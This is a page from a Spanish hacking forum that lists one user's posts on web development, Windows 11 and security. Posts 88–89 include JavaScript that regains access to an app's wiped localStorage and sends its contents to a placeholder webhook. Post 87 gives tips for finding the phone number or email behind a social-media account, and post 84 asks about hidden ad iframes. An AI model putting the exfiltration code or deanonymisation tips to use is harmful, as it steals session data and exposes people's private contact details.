elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ... 40
81  Programación / Desarrollo Web / Re: Datos Página Web en: 16 Junio 2021, 22:33 pm
Hola.

¿Hablas de una base de datos tuya?
¿Qué tipo de base de datos, qué gestor?
¿Sabes como funciona una db?

Saludos.
82  Foros Generales / Foro Libre / Re: Mis dudas existenciales yo win_7 en: 16 Junio 2021, 22:29 pm
Tranquilo... el solo busca expandir su franquicia... no creas que este es su primer emprendimiento, aunque si es el primero donde ha tenido éxito y de allí su visión para explorar nuevos mercados...  ;D ::) ;D

Que la fuerza lo acompañe.

 :rolleyes: :o :rolleyes:
Jajajaja, un fenómeno el win desarrollando su propio imperio.
83  Programación / Desarrollo Web / Re: Google ADS | ¿Iframes pagos? en: 16 Junio 2021, 22:24 pm
No es legal, utilizar un ifarme ocultos o invisbles o de tamaño. Pero aunque lo fuera, tampoco funcionaría. No se cargará el código del anuncio y tampoco habrá click.

Google no paga por impresiones sólo por clics. Cargar un iframe no es una "visita", sería una impresión y no hay clic"
Ya, buenísimo, gracias por la respuesta.

Consideraba que el pago era por la impresión simplemente.

Saludos.
84  Programación / Desarrollo Web / Google ADS | ¿Iframes pagos? en: 16 Junio 2021, 08:39 am
Hola.

Nunca me interesó mucho el asunto de poner publicidad en un sitio web a cambio de unos dólarillos, pero hoy me saltó la curiosidad acerca de una puntual pregunta;

Imaginando que tenemos un sitio (A), en el cual se encuentran las publicidades de Google, y un sitio (B) donde coloco unos iframes invisibles apuntando al sitio A.

¿Google considera esto como una visita real?, ¿o utiliza una simple validación rechazando las visitas con algo como: "Access-Control-Allow-Origin"?

Saludos.
85  Sistemas Operativos / Windows / Re: Windows 11 en: 15 Junio 2021, 23:48 pm
Hola.

Está como tendencia en Twitter "Windows 11", donde se aportan supuestas filtraciones del nuevo Windows (o nueva actualización del 10 nada más, quien sabe).

ADSLZONE: Filtrada la ISO de Windows 11.


Saludos.
86  Foros Generales / Dudas Generales / Re: Cuenta Google verificación en: 15 Junio 2021, 21:49 pm
Hola, logré conseguir las credenciales de una cuenta de Google pero al ingresar tiene la doble verificación y me aparece que no reconoce el dispositivo desde el que ingrese y me pide que verificar con el código que van a enviar pero no lo tengo alguien sabe como puedo saltar la verificación, gracias
Hola.

La doble verificación, verificación en dos pasos o como quieras llamarle, es una extensión de seguridad que puedes utilizar para proteger tu cuenta.
No solo te pedirá el código porque estás accediendo desde otro dispositivo, sino que siempre te lo pedirá, a menos que permitas el acceso desde tu ordenador/celular sin pedir la autentificación.
No podrás acceder a la cuenta, debido a que no hay forma alguna de "Bypassear" el sistema de autenticación en dos pasos.
Es lo más seguro que existe hoy en día al igual que las llaves físicas que se utilizan para permitir el acceso.

Saludos.
87  Seguridad Informática / Hacking / Re: Obtener telefono/email asociado a una cuenta de facebook o instagram en: 15 Junio 2021, 04:14 am
Hola.

Hay alguna que otra manera, tienes que usar la lógica que utilizan dichos servicios.

Por ejemplo:

Métodos de recuperación utilizados en la plataforma.

Cantidad de caracteres visibles al intentar recuperar: Todos los servicios ofrecen recuperar contraseña.
Mientras que algunos te muestran ***ed@ejemplo.com || otros te dan: xyz**@ejemplo.com

Información a tu favor en la red social: Sea la red social que sea, siempre hay data de importancia que te puede servir.

Buscar a fondo: Si conseguís un correo podes con esto conseguir un teléfono y viceversa.

Por otra parte, podes optar por utilizar la herramienta OSINT para obtener información.
88  Programación / Desarrollo Web / Re: Enviar localstorage mediante webhook desde la consola, error 404 ¿? en: 11 Junio 2021, 10:55 am
Actualizo: Ya lo pude resolver, simplemente pasando el parametro exacto a buscar en LocalStorage funciona sin problemas:


Código
  1. //cambiar:
  2. var msg = LocalStorage;
  3. //por:
  4. var msg = LocalStorage.getItem('valor');
  5. //Al parecer al justificar exactamente que quieres enviar lo hace sin problemas.
  6.  

Saludos.
89  Programación / Desarrollo Web / Enviar localstorage mediante webhook desde la consola, error 404 ¿? en: 11 Junio 2021, 10:37 am
Hola.

Estuve informandome acerca del funcionamiento de LocalStorage, siempre me maneje más por el lado de las cookies y estoy obteniendo un error al intentar enviar mediante una webhook desde la consola un valor del mencionado almacenador de información;

Código
  1. function getLocalStoragePropertyDescriptor() {
  2.  const iframe = document.createElement('iframe');
  3.  document.head.append(iframe);
  4.  const pd = Object.getOwnPropertyDescriptor(iframe.contentWindow, 'localStorage');
  5.  iframe.remove();
  6.  return pd;
  7. }
  8.  
  9. Object.defineProperty(window, 'localStorage', getLocalStoragePropertyDescriptor());
  10. const localStorage = getLocalStoragePropertyDescriptor().get.call(window);
  11.  
  12.  

La aplicación al iniciarse limpia y no permite de alguna forma acceder a LocalStorage, por lo tanto utilice esa función que encontré navegando para poder acceder al LocalStorage.

Para corroborar que la función mencionada este en correcto funcionamiento hice una simple impresión desde la consola con:

Código
  1. console.log(LocalStorage);
  2.  

Esto devuelve lo buscado sin ningún problema, por lo tanto la función getLocalStoragePropertyDescriptor está bien.

Luego de eso, intente desde la misma consola poder enviar un webhook, esto funciona correctamente, pero al pasar el contenido de "LocalStorage" a una variable para ser enviado, recibo el error 404.
Este es el código;

Código
  1. function enviarhook() {
  2.      var request = new XMLHttpRequest();
  3.      request.open("POST", "direcciondelhook");
  4.  
  5.      request.setRequestHeader('Content-type', 'application/json');
  6.  
  7.      var msg = LocalStorage; //Linea que causa el error, msg es el contenido que sera enviado mediante POST al webhook. Si en vez de "LocalStorage" le atribuyo cualquier otro contenido, se envia correctamente, pero en cambio si esta tal cual lo presente aqui, recibo un error 400 "POST".
  8.  
  9.      var params = {
  10.        content: msg
  11.      }
  12.  
  13.      request.send(JSON.stringify(params));
  14.    }
  15.  

Quizás esto está prohibido por un tema de seguridad, pero puede ser que este empleando algo mal por lo tanto realizo el post aquí.

La pregunta es; ¿Cuál es el causante del error?

Saludos.
90  Seguridad Informática / Seguridad / Re: Oferta de Trabajo: Mercadona buscar un hacker - Pentester - Red Team en: 10 Junio 2021, 10:55 am
Lo que creo que tendría que hacer Mercadona y cualquier otra empresa es encargar a una empresa externa que se dedique a ello para hacer una auditoría de seguridad. Saldrá quizás más caro, pero los resultado serán mas buenos.

Una sola persona no es suficiente para hacer hacer una prueba de pentesting, aunque entiendo según leo en la oferta, que que la persona se unirá a un equipo de más personas...
Exactamente, eso es algo más eficaz, HackerOne o similares donde das la posibilidad de protección a cambio de un dinerillo, que en este caso en particular para Mercadona, es un vuelto.

Es más bien una inversión que un gasto.

Siempre me pregunté si la información detallada en la aplicación web de la mencionada organización es real, es un delirio la cantidad de vulnerabilidades con las que contaban varias multinacionales y los millones que se ahorraron por haber parchado sus errores a tiempo antes de un ataque.
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ... 40
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines